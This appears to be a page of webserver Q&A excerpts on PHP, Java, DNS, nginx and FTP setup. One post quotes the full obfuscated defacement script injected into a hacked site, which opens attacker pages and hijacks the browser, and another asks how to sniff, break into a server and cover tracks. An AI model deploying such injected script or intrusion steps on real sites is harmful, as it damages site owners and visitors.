Search Results

Search found 2349 results on 94 pages for 'webdev webserver'.

Page 12/94 | < Previous Page | 8 9 10 11 12 13 14 15 16 17 18 19  | Next Page >

  • Mysqli query only works on localhost, not webserver

    - by whamo
    Hello. I have changed some of my old queries to the mysqli framework to improve performance. Everything works fine on localhost, but when I upload it to the webserver it outputs nothing. After connecting I check for errors and there are none. I also checked the PHP modules installed and mysqli is enabled. I am certain that it creates a connection to the database, as no errors are displayed (when I changed the database name string it gave the error). There is no output from the query on the webserver, which looks like this:

        $mysqli = new mysqli("server", "user", "password");
        if (mysqli_connect_errno()) {
            printf("Can't connect Errorcode: %s\n", mysqli_connect_error());
            exit;
        }

        // Query used
        $query = "SELECT name FROM users WHERE id = ?";
        if ($stmt = $mysqli->prepare($query)) {
            // Specify parameters to replace '?'
            $stmt->bind_param("d", $id);
            $stmt->execute();

            // bind variables to prepared statement
            $stmt->bind_result($_userName);
            while ($stmt->fetch()) {
                echo $_userName;
            }
            $stmt->close();
        }

        // close connection
        $mysqli->close();

    As I said, this code works perfectly on my local server, just not online. I checked the error logs and there is nothing, so everything points to a good connection. All the tables exist as well, etc. Anyone any ideas? This one has me stuck! Also, if I get this working, will all my other queries still work, or will I need to make them use the mysqli framework as well? Thanks in advance.
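
    One pattern worth noting (a hedged sketch, not the poster's exact code): prepare() returns false on failure without printing anything, so a silent empty page is consistent with a failed prepare. Logging $mysqli->error in an else branch, and passing the database name as the fourth constructor argument, makes that kind of failure visible. Hostname, credentials and database name below are placeholders:

        <?php
        // Connect, selecting the database explicitly (fourth argument).
        $mysqli = new mysqli("db.example.com", "user", "password", "mydatabase");
        if (mysqli_connect_errno()) {
            die("Connect failed: " . mysqli_connect_error());
        }

        $id = 1; // example value
        $query = "SELECT name FROM users WHERE id = ?";
        if ($stmt = $mysqli->prepare($query)) {
            $stmt->bind_param("d", $id);
            $stmt->execute();
            $stmt->bind_result($userName);
            while ($stmt->fetch()) {
                echo $userName;
            }
            $stmt->close();
        } else {
            // prepare() failed -- surface the reason instead of failing silently.
            error_log("Prepare failed: " . $mysqli->error);
        }
        $mysqli->close();
        ?>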

    Read the article

  • JAVA - Download PDF file from Webserver

    - by Augusto Picciani
    I need to download a PDF file from a webserver to my PC and save it locally. I used HttpClient to connect to the webserver and get the content body:

        HttpEntity entity = response.getEntity();
        InputStream in = entity.getContent();
        String stream = CharStreams.toString(new InputStreamReader(in));
        int size = stream.length();
        System.out.println("stringa html page LENGTH:" + stream.length());
        System.out.println(stream);
        SaveToFile(stream);

    Then I save the content to a file:

        // check CRLF (i don't know if i need to do this)
        String[] fix = stream.split("\r\n");
        File file = new File("C:\\Users\\augusto\\Desktop\\progetti web\\test\\test2.pdf");
        PrintWriter out = new PrintWriter(new FileWriter(file));
        for (int i = 0; i < fix.length; i++) {
            out.print(fix[i]);
            out.print("\n");
        }
        out.close();

    I also tried to save the String content to a file directly:

        OutputStream out = new FileOutputStream("pathPdfFile");
        out.write(stream.getBytes());
        out.close();

    But the result is always the same: I can open the PDF file but I see white pages only. Is the mistake around the PDF stream/endstream charset encoding? Does the PDF content between stream and endstream need to be manipulated in some other way?
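
    The usual cause of exactly this symptom is decoding the binary body into a String at all: a PDF is not text, and the byte-to-char round-trip corrupts it. A minimal sketch that copies the entity's raw bytes straight to disk, assuming the Apache HttpClient 4.x response from the question (the file path is a placeholder):

        import java.io.FileOutputStream;
        import java.io.IOException;
        import java.io.InputStream;
        import java.io.OutputStream;
        import org.apache.http.HttpResponse;

        static void savePdf(HttpResponse response, String path) throws IOException {
            InputStream in = response.getEntity().getContent();
            OutputStream out = new FileOutputStream(path);
            byte[] buffer = new byte[8192];
            int n;
            // Copy raw bytes; no Reader/Writer involved, so nothing re-encodes the PDF.
            while ((n = in.read(buffer)) != -1) {
                out.write(buffer, 0, n);
            }
            out.close();
            in.close();
        }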

    Read the article

  • What is the easiest way to have a local LAMP installation for web development on Mac OS X?

    - by pixeline
    I'm new to Mac OS X. In the Windows XP world, there are packages available, like EasyPHP, WampServer and Uniform Server, that give you a local webserver complete with PHP and MySQL, configured via an automatic installer. Really handy. I need the same on my new Mac. I know Mac OS X comes with a local webserver. Does it come with PHP and MySQL preinstalled? I'd like your advice on the easiest way to get this local LAMP stack so that I can continue developing on this nice and shiny machine. Thanks!
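
    For reference, a minimal sketch of turning on the built-in pieces (paths assume a Snow Leopard-era OS X; MySQL is not bundled and needs a separate installer, or an all-in-one package such as MAMP):

        # Start the bundled Apache
        sudo apachectl start

        # Enable the bundled PHP module by uncommenting this line in /etc/apache2/httpd.conf:
        #   LoadModule php5_module libexec/apache2/libphp5.so
        sudo apachectl restart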

    Read the article

  • SSH Chown problems

    - by Michael
    I have a webserver with multiple domain and user accounts set up. Recently I renamed one of the domain names and changed its username correspondingly. However, this new user cannot access the data from the domain because it does not have the required permissions. How can I solve this problem? I've tried chown and I still cannot get access to the files. I have SSH root access, and this is the only way I can actually move/touch the files, but the webserver serves the files through another username which does not have access to them. Thanks
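
    For what it's worth, a common slip is chowning only the top-level directory; a recursive chown over the whole docroot usually covers it (user and path below are placeholders):

        # Recursively hand the whole tree to the new user and its group
        chown -R newuser:newuser /home/newuser/public_html

        # Then verify what the webserver user can actually read
        ls -la /home/newuser/public_html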

    Read the article

  • Bind9 on Debian not responding

    - by Marc
    I'm trying to set up a webserver with Bind9 and apache2 on Debian 6. I am trying to learn to do it manually, so I do not have any control panels or anything, just the command line. I have a domain name, let's call it www.example.com. I want a virtual host setup so that I can have multiple websites with different names on my server. I have ns1.example.com and ns2.example.com registered at my server's IP (123.456.789.12). Below is my Bind9 named.conf.options:

        options {
            directory "/var/cache/bind";

            // If there is a firewall between you and nameservers you want
            // to talk to, you may need to fix the firewall to allow multiple
            // ports to talk. See http://www.kb.cert.org/vuls/id/800113

            // If your ISP provided one or more IP addresses for stable
            // nameservers, you probably want to use them as forwarders.
            // Uncomment the following block, and insert the addresses replacing
            // the all-0's placeholder.

            // forwarders {
            //     0.0.0.0;
            // };

            auth-nxdomain no;    # conform to RFC1035
            listen-on-v6 { any; };
        };

    This is the default; I'm not sure if I was supposed to edit it. I didn't. Here is my named.conf.default-zones:

        // prime the server with knowledge of the root servers
        zone "." {
            type hint;
            file "/etc/bind/db.root";
        };

        // be authoritative for the localhost forward and reverse zones, and for
        // broadcast zones as per RFC 1912
        zone "localhost" {
            type master;
            file "/etc/bind/db.local";
        };

        zone "127.in-addr.arpa" {
            type master;
            file "/etc/bind/db.127";
        };

        zone "0.in-addr.arpa" {
            type master;
            file "/etc/bind/db.0";
        };

        zone "255.in-addr.arpa" {
            type master;
            file "/etc/bind/db.255";
        };

        zone "example.com.com" {
            type master;
            file "etc/bind/example.com.db";
        };

    named.conf.local is an empty file with a comment saying to do local configuration there. example.com.db looks like this:

        ; BIND data file for mywebsite.com
        ;
        $ORIGIN example.com.
        $TTL    604800
        @       IN      SOA     ns1.example.com. admin.example.com. (
                                2009120101      ; Serial
                                604800          ; Refresh
                                86400           ; Retry
                                2419200         ; Expire
                                604800 )        ; Negative Cache TTL
        ;
                IN      NS      ns1.example.com.
                IN      NS      ns2.example.com.
                IN      MX      10 mail.example.com.
        localhost       IN      A       127.0.0.1
        example.com.    IN      A       123.456.789.12
        ns1             IN      A       123.456.789.12
        ns2             IN      A       123.456.789.12
        www             IN      A       123.456.789.12
        ftp             IN      A       123.456.789.12
        mail            IN      A       123.456.789.12
        boards          IN      CNAME   www

    These are all settings I've found in various tutorials. Now when I go to intoDNS I get:

        You should already know that your NS records at your nameservers are missing, so here it is again:
        ns1.example.com
        ns2.example.com

    Can someone help me? I'm not sure what I'm doing wrong.
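
    Two checking tools ship with BIND and will usually pinpoint typos such as a wrong zone name or a bad file path; a quick sanity check, assuming the stock Debian file locations:

        # Syntax-check the main config and everything it includes
        named-checkconf /etc/bind/named.conf

        # Load the zone file the way named would, for the zone you meant to serve
        named-checkzone example.com /etc/bind/example.com.db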

    Read the article

  • Duplicate GET request from multiple IPs - can anyone explain this?

    - by dwq
    We've seen a pattern in our webserver access logs which we're having trouble explaining. A GET request appears in the access log for a legitimate, but private, URL, as part of normal e-commerce website use (by private, we mean there is a unique key in a URL form variable generated specifically for that customer session). Then a few seconds later we get hit with an identical request, maybe 10-15 times within the space of a second. The duplicate requests are all from different IP addresses. The UserAgent for the duplicates is the same across all of them (but different from the original request). The reverse DNS lookup on the IPs for all the duplicate requests resolves to the same large hosting company. Can anyone think of a scenario that would explain this? EDIT 1: Here's an example that's probably anonymised beyond being any actual use, but it might give an idea of the sort of pattern we're seeing (it's from a search query, as they sometimes get duplicated too):

        xx.xx.xx.xx - - [21/Jun/2013:21:42:57 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "http://www.ourdomain.com/index.html" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:03 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:03 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"
        xx.xx.xx.xx - - [21/Jun/2013:21:43:04 +0100] "GET /search.html?search=widget&Submit=Search HTTP/1.0" 200 5475 "" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_7) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.91 Safari/534.30"

    UPDATE 2: Sometimes it is part of a checkout flow that's duplicated too, so I'd think Twitter is unlikely.

    Read the article

  • Getting ERR_DNS_FAIL when loading a local webserver page?

    - by NickA
    When I go to a page hosted on a machine on a local network, I get a "The page cannot be found" error with "ERR_DNS_FAIL" in the title. Any ideas what this is or why I am getting it on my computer? I've tried in Firefox, IE and Chrome. Other computers on the network load the page just fine. I'm pretty sure it is from the hostname. I am able to access the page if I browse to it using the IP of the machine. However, it has two hostnames and both are giving the ERR_DNS_FAIL error. I tried restarting the browsers or rebooting the machine, but neither helped. EDIT: ISSUE RESOLVED ON ITS OWN!
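
    A quick way to compare what the affected machine resolves against a working one, assuming Windows given the IE mention (the hostname below is a placeholder):

        nslookup the-hostname
        ipconfig /flushdns

    If nslookup disagrees with the working machines, the local DNS cache or the hosts file is the usual suspect.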

    Read the article

  • Configure APE-Server on Ubuntu 10.10 webserver

    - by sadmicrowave
    I'm having problems configuring my ape-server. First, I reside behind a corporate firewall where our own DNS servers are maintained. I requested a domain name for my server and was provided uslonsweb003.us.mycompany.com by my IT group. Therefore, my website works and can be accessed (intranet only) at http://uslonsweb003.us.mycompany.com/test.php. I followed the instructions at ape-project.org and ran the Check Tool at the end, only to find I get an error stating:

        Running test : Contacting APE Server (adding frequency)
        Can't contact APE Server. Please check the folowing url is pointing to your APE server :
        http://0.uslonsweb003.us.mycompany.com:6969

    My /etc/apache2/apache2.conf virtual host looks as follows:

        <VirtualHost *:80>
            Servername uslonsweb003.us.mycompany.com
            ServerAlias ape.uslonsweb003.us.mycompany.com
            ServerAlias *.ape.uslonsweb003.us.mycompany.com
            DocumentRoot "/var/www/"
        </VirtualHost>

    My /var/www/ape-jsf/Demos/config.js config section looks as follows:

        APE.Config.baseUrl = 'http://uslonsweb003.us.mycompany.com/ape-jsf';
        APE.Config.domain = 'uslonsweb003.us.mycompany.com';
        APE.Config.server = 'uslonsweb003.us.mycompany.com:6969';

    The instructions at ape-project.org tell me that APE.Config.server should be 'ape.mydomain.com:6969', but that does not work (I'm assuming because my corporate DNS does not understand the 'ape' before the domain name, since 'ape' was not registered with the IT DNS). So therefore I changed it to what you see above. Please help!! Thanks in advance.

    UPDATE 1: Per the installation instructions at http://www.ape-project.org/wiki/index.php/Advanced_APE_configuration under 'Configure your Server/Computer' (I'm running it on a server, obviously), it says I need to add some lines to my DNS config file. It sounds like (since I'm within a corporate network) I would ask my IT group to add the following lines to the DNS configuration file on their end:

        ape     IN A     x.x.x.x   ; IP address of my APE server
        *.ape   IN CNAME ape

    I just want to make sure this is all I have to have them add (or if this is even correct) before I ask them.
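
    A quick way to confirm whether the missing wildcard name is the problem, assuming dig and curl are available on the server (hostnames as in the question):

        # Does the corporate DNS resolve an arbitrary label under the domain?
        dig +short 0.uslonsweb003.us.mycompany.com

        # Is the APE daemon itself answering on its port?
        curl -i http://uslonsweb003.us.mycompany.com:6969/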

    Read the article

  • Webserver directory index: index.xml?

    - by Marius
    Hello there, I am making my first RSS feed, and I want to host it like this: www.example.com/rss/. I tried naming the XML file "index.xml" and placing it inside the directory; however, when I type http://www.example.com/rss/ I arrive at "Index of /rss", where the file is listed as part of the directory but is not loaded automatically. What can be done about this? Thank you for your time. Kind regards, Marius
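
    Assuming Apache (the "Index of /rss" listing suggests mod_autoindex), the filenames tried as a directory index are configurable; a minimal .htaccess sketch for the /rss/ directory, provided AllowOverride permits Indexes options:

        # Serve index.xml when the directory itself is requested
        DirectoryIndex index.xml index.html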

    Read the article

  • centos: nginx + thin webserver, incoming connections not allowed

    - by cbrulak
    I set up a fresh CentOS 5 install, compiled nginx from scratch and am using thin as the Rails server. If I visit the IP address on the LAN, for example 1.2.3.4, I get a "website not found" error. However, I can SSH into the machine, and if I use links to visit the IP address locally, I get the landing page. Any suggestions? Thanks. EDIT: I ran system-config-securitylevel and was then able to change the security settings to allow incoming connections.
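
    The symptom, reachable locally but not from the LAN, matches the default CentOS firewall; system-config-securitylevel is the text-mode front end for it. The equivalent by hand, a sketch assuming the stock iptables service on CentOS 5:

        # Allow inbound HTTP, then persist the rule across reboots
        iptables -I INPUT -p tcp --dport 80 -j ACCEPT
        service iptables save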

    Read the article

  • CentOS 6.3 vsftpd unable to upload file to Apache webserver

    - by user148648
    I am new to CentOS. I worked with Sun Solaris and uploaded files to an Apache web server before. I created an end-user account and managed to FTP to the server from the command prompt; the error message is '226 Transfer Done (but failed to open directory)'. The content of my vsftpd.conf is below:

        # Example config file /etc/vsftpd/vsftpd.conf
        #
        # The default compiled in settings are fairly paranoid. This sample file
        # loosens things up a bit, to make the ftp daemon more usable.
        # Please see vsftpd.conf.5 for all compiled in defaults.
        #
        # READ THIS: This example file is NOT an exhaustive list of vsftpd options.
        # Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
        # capabilities.
        #
        # Allow anonymous FTP? (Beware - allowed by default if you comment this out).
        anonymous_enable=YES
        # ** may need to comment it back
        #
        # Uncomment this to allow local users to log in.
        local_enable=YES
        #
        # Uncomment this to enable any form of FTP write command.
        write_enable=YES
        #
        # Default umask for local users is 077. You may wish to change this to 022,
        # if your users expect that (022 is used by most other ftpd's)
        #local_umask=022
        local_umask=077
        #
        # Uncomment this to allow the anonymous FTP user to upload files. This only
        # has an effect if the above global write enable is activated. Also, you will
        # obviously need to create a directory writable by the FTP user.
        anon_upload_enable=YES
        # *** maybe to comment it back!!!
        #
        # Uncomment this if you want the anonymous FTP user to be able to create
        # new directories.
        anon_mkdir_write_enable=YES
        # ** may need to comment it back!!!
        #
        # Activate directory messages - messages given to remote users when they
        # go into a certain directory.
        dirmessage_enable=YES
        #
        # The target log file can be vsftpd_log_file or xferlog_file.
        # This depends on setting xferlog_std_format parameter
        xferlog_enable=YES
        #
        # Make sure PORT transfer connections originate from port 20 (ftp-data).
        connect_from_port_20=YES
        #
        # If you want, you can arrange for uploaded anonymous files to be owned by
        # a different user. Note! Using "root" for uploaded files is not
        # recommended!
        #chown_uploads=YES
        #chown_username=whoever
        #
        # The name of log file when xferlog_enable=YES and xferlog_std_format=YES
        # WARNING - changing this filename affects /etc/logrotate.d/vsftpd.log
        xferlog_file=/var/log/xferlog
        #
        # Switches between logging into vsftpd_log_file and xferlog_file files.
        # NO writes to vsftpd_log_file, YES to xferlog_file
        xferlog_std_format=YES
        #
        # You may change the default value for timing out an idle session.
        #idle_session_timeout=600
        #
        # You may change the default value for timing out a data connection.
        #data_connection_timeout=120
        #
        # It is recommended that you define on your system a unique user which the
        # ftp server can use as a totally isolated and unprivileged user.
        #nopriv_user=ftpsecure
        #
        # Enable this and the server will recognise asynchronous ABOR requests. Not
        # recommended for security (the code is non-trivial). Not enabling it,
        # however, may confuse older FTP clients.
        #async_abor_enable=YES
        #
        # By default the server will pretend to allow ASCII mode but in fact ignore
        # the request. Turn on the below options to have the server actually do ASCII
        # mangling on files when in ASCII mode.
        # Beware that on some FTP servers, ASCII support allows a denial of service
        # attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
        # predicted this attack and has always been safe, reporting the size of the
        # raw file.
        # ASCII mangling is a horrible feature of the protocol.
        ascii_upload_enable=YES
        ascii_download_enable=YES
        #
        # You may fully customise the login banner string:
        ftpd_banner=Warning, only for authorize login.
        #
        # You may specify a file of disallowed anonymous e-mail addresses. Apparently
        # useful for combatting certain DoS attacks.
        #deny_email_enable=YES
        # (default follows)
        #banned_email_file=/etc/vsftpd/banned_emails
        #
        # You may specify an explicit list of local users to chroot() to their home
        # directory. If chroot_local_user is YES, then this list becomes a list of
        # users to NOT chroot().
        chroot_local_user=YES
        chroot_list_enable=YES
        # (default follows)
        #chroot_list_file=/etc/vsftpd/chroot_list
        local_root=/var/www
        #
        # You may activate the "-R" option to the builtin ls. This is disabled by
        # default to avoid remote users being able to cause excessive I/O on large
        # sites. However, some broken FTP clients such as "ncftp" and "mirror" assume
        # the presence of the "-R" option, so there is a strong case for enabling it.
        ls_recurse_enable=YES
        #
        # When "listen" directive is enabled, vsftpd runs in standalone mode and
        # listens on IPv4 sockets. This directive cannot be used in conjunction
        # with the listen_ipv6 directive.
        listen=YES
        #
        # This directive enables listening on IPv6 sockets. To listen on IPv4 and IPv6
        # sockets, you must run two copies of vsftpd with two configuration files.
        # Make sure, that one of the listen options is commented !!
        #listen_ipv6=YES

        pam_service_name=vsftpd
        userlist_enable=YES
        tcp_wrappers=YES
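
    Two things worth checking on CentOS 6 before touching the config further (a guess, not a diagnosis): directory permissions under /var/www for the chrooted user, and SELinux, which confines vsftpd by default. A quick probe, assuming the stock policy tools are installed:

        # Is SELinux enforcing, and which FTP booleans are set?
        getenforce
        getsebool -a | grep ftp

        # Commonly needed for local users writing outside their home directories
        setsebool -P allow_ftpd_full_access on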

    Read the article

  • phpinfo() changes not taking effect after editing php.ini on nginx webserver

    - by khoanhd
    I've already installed PHP, FastCGI and nginx, and the system runs with no problems. The problem happens when: I update memory_limit in php.ini and then restart php-cgi and nginx, but phpinfo() still shows the old memory_limit. I also installed 2 new extensions, curl and memcache, adding the two lines extension=curl.so and extension=memcache.so, then restarted php-cgi and nginx, but phpinfo() does not show curl or memcache either. So, what should I do? Please help me.
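
    The classic cause is editing a php.ini that the CGI binary never reads; phpinfo() reports the one actually loaded under "Loaded Configuration File". A minimal check (php_ini_loaded_file() exists as of PHP 5.2.4):

        <?php
        // Which ini file did this SAPI actually load?
        echo php_ini_loaded_file();
        // Compare with the CLI, which often loads a different one:
        //   php --ini
        ?>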

    Read the article

  • My webserver just got hacked [closed]

    - by billmalarky
    Possible Duplicate: My server's been hacked EMERGENCY My web server just got hacked. It was on a vps so I think it was hacked through another site. When I loaded the homepage it looks like it ran some script. Can anyone tell me if this script is malicious and if I just got screwed by my own website? `<script>var _0x8ae2=["\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x6F\x70\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x7A\x6F\x6E\x65\x2D\x68\x2E\x6F\x72\x67\x2F\x61\x72\x63\x68\x69\x76\x65\x2F\x6E\x6F\x74\x69\x66\x69\x65\x72\x3D\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45\x2F\x73\x70\x65\x63\x69\x61\x6C\x3D\x31","\x68\x74\x74\x70\x3A\x2F\x2F\x6C\x6D\x67\x74\x66\x79\x2E\x63\x6F\x6D\x2F\x3F\x71\x3D\x48\x61\x63\x6B\x65\x64\x20\x62\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x25\x34\x30\x54\x45","\x73\x63\x72\x6F\x6C\x6C\x42\x79","\x74\x69\x74\x6C\x65","\x48\x61\x63\x6B\x65\x44\x20\x42\x79\x20\x54\x69\x47\x45\x52\x2D\x4D\x40\x54\x45","\x6F\x6E\x6B\x65\x79\x64\x6F\x77\x6E","\x72\x65\x73\x69\x7A\x65\x54\x6F","\x6D\x6F\x76\x65\x54\x6F","\x6D\x6F\x76\x65\x28\x29","\x72\x6F\x75\x6E\x64","\x66\x67\x43\x6F\x6C\x6F\x72","\x62\x67\x43\x6F\x6C\x6F\x72","\x4C\x4F\x4C","\x61\x76\x61\x69\x6C\x57\x69\x64\x74\x68","\x61\x76\x61\x69\x6C\x48\x65\x69\x67\x68\x74"];function details(){window[_0x8ae2[1]](_0x8ae2[0]);window[_0x8ae2[1]](_0x8ae2[2]);window[_0x8ae2[1]](_0x8ae2[3]);} ;window[_0x8ae2[4]](0,1);if(document[_0x8ae2[5]]==_0x8ae2[6]){function keypressed(){return false;} ;document[_0x8ae2[7]]=keypressed;window[_0x8ae2[8]](0,0);window[_0x8ae2[9]](0,0);setTimeout(_0x8ae2[10],2);var mxm=50;var mym=25;var mx=0;var my=0;var sv=50;var status=1;var szx=0;var szy=0;var c=255;var n=0;var sm=30;var cycle=2;var done=2;function move(){if(status==1){mxm=mxm/1.05;mym=mym/1.05;mx=mx+mxm;my=my-mym;mxm=mxm+(400-mx)/100;mym=mym-(300-my)/100;window[_0x8ae2[9]](mx,my);rmxm=Math[_0x8ae2[11]](mxm/10);rmym=Math[_0x8ae2[11]](mym/10);if(rmxm==0){if(rmym==0){status=2;} ;} ;} ;if(status==2){sv=sv/1.1;scrratio=1+1/3;mx=mx-sv*scrratio/2;my=my-sv/2;szx=szx+sv*scrratio;szy=szy+sv;window[_0x8ae2[9]](mx,my);window[_0x8ae2[8]](szx,szy);if(sv<0.1){status=3;} ;} ;if(status==3){document[_0x8ae2[12]]=0xffffFF;c=c-16;if(c<0){status=8;} ;} ;if(status==4){c=c+16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>239){status=5;} ;} ;if(status==5){c=c-16;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c<0){status=6;cycle=cycle-1;if(cycle>0){if(done==1){status=7;} else {status=4;} ;} ;} ;} ;if(status==6){document[_0x8ae2[5]]=_0x8ae2[14];alert(_0x8ae2[14]);cycle=2;status=4;done=1;} ;if(status==7){c=c+4;document[_0x8ae2[13]]=c*65536;document[_0x8ae2[12]]=(255-c)*65536;if(c>128){status=8;} ;} ;if(status==8){window[_0x8ae2[9]](0,0);sx=screen[_0x8ae2[15]];sy=screen[_0x8ae2[16]];window[_0x8ae2[8]](sx,sy);status=9;} ;var _0xceebx11=setTimeout(_0x8ae2[10],0.3);} ;} ;</script><body bgcolor="#000000" oncontextmenu="return false;"><p align="center"><span style="font-weight: 700;"><font face="Tahoma" size="5" color="#EEEEEE"><i>Server HackeD<br/><br/>By</i> </font><br/><br/><a href="#" class="name"><script>if (navigator.appName == 'Microsoft Internet Explorer'){document.write('<font face="Arial Black" size="5" color="#FF0000">');}else{document.write('<font face="Arial Black" size="5" color="black" style="text-shadow:#FFFFFF 2px 2px 5px">');}</script><i 
onclick="details()">TiGER-M@TE</i></font></a></span><br/><br/><script>var l1n3='<img src="data:image/gif;base64,R0lGODlhqAABAOYAAAMDA3d4eAAAAAICAfLy8l5dXaWlpSQlJBwcHBQVFBISEQ0NDbu7u/v8/EJBQePj4/3+/T4+PtjX2Do7OlZWVyEiIjc3N09PT4OEhIB/f/r6+sjIyMTExPb29rS0tHx7fOvr64+Pj4eHh56dnZqZmvT09GVlZejp6dXU1aGhoeXm5khISJKTk93e3hkZGQcHB0RFRBcXF+7u7isqKi4uLmxtbLe3t6ysrXR0dTQ0M87Ozw8QEMvLy6ipqQUFBUxMTAkJCdHS0vDw73BwcQsLCycnJ/j4+JeXl8HBwmFhYVNSU+Dg4Glpadvb2jEwML6+vrCvsB8fH4uLi1pZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAACoAAEAAAewgBANGkYdJQRCMiAnKg9LLU0SKEE6PBscSE8MNh5QNz0GKSMkRywhUiIYGR8BOEM1TCZJBVMUShc/KzAOERMWOU40M0UHFVEILjEJCjsLREAvPgADAgIDAD4vQEQLOwoJMS4IURUHRTM0TjkWExEOMCs/F0oUUwVJJkw1QzgBHxkYREgJweIIiREpDPS4AcWDDQZPkHDYwENHEBQSmrRY8kDFCRAyhBAo0cGIhgYQAgEAOw==" />'; document.write(l1n3+l1n3);`

    Read the article

  • Packet sniffing a webserver

    - by Shawn Mclean
    I have a homework assignment in which I should explain how I would break into a server, retrieve a file and cover my tracks. My main question: is there a way to packet-sniff a remote web server? Any other information on covering tracks would also be appreciated.

    Read the article

  • Getting started with webserver clustering

    - by Ernie
    I work for a small ISP, and we host about 250 domains and all the stuff that goes along with that: DNS, mail, spam filtering, and backups. Currently we have separate DNS servers (two of them) and mail servers (outgoing mail is actually on the secondary DNS server, but was previously on its own server). In the past this was done as an insurance measure: the last thing we need is for some doofus (usually yours truly) to hose a server, taking out DNS and mail right along with it, or for spammers to jam our incoming SMTP server, preventing outgoing mail from being sent too. In the past this was a problem, and our servers were set up the way they are now to combat it. However, clustering solutions like Sun's Cobalt RAQ (in days of olde) and Virtualmin appear to cater to an all-in-one approach, then deal with failures through redundant servers. I have avoided this thus far, but we've been using Virtualmin on our web server for a while now, and I'd like to expand into using it for a high-availability cluster. Our networking partner has recently built a datacenter that has eliminated all of our other bugaboos like network, cooling, and power issues, so now the only thing left to go wrong is me hosing a server, which happened earlier this month. One of the bigger reasons we've avoided going this route is that our hardware requirements aren't particularly high: one server easily handles all the sites we host (most of them are flat sites). Also, load-balancing routers tend to be expensive and complicated. All that I'm really expecting to do is build a two-node cluster for redundancy, so that when I hose a server (however rare that might be), we're not out for 8-12 hours while I rebuild it. What I need to know is how to get started, and whether I'm really in a position to bother with this kind of thing at all.

    Read the article

  • Ubuntu VPS - email and webserver

    - by xZero
    I have a VPS based on Ubuntu with the whole LAMP stack installed, everything needed for a web server, and it works perfectly, but I'm still not able to configure it as a mail server. I have configured an MX record for my domain, mail.mydomain.com, and that part is OK. I also installed Postfix, Dovecot and Roundcube, configured using this tutorial: http://ubuntuguide.org/wiki/Mail_Server_setup. After hours of configuring, it doesn't work. I have experience with Linux and web hosting, and I successfully configured a mail server once in the past on Debian 6, and that was with help from there. When I try to send email to myself, Gmail says:

        Technical details of permanent failure:
        Google tried to deliver your message, but it was rejected by the server for the
        recipient domain mydomain.com by dc147738a1117e4c12273.mydomain.com. [MY_SERVER_IP].
        The error that the other server returned was:
        554 5.7.1 <[email protected]>: Relay access denied

    Also, I have the Webmin control panel, which works perfectly; how do I configure Postfix and Dovecot from there? Thanks in advance.
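
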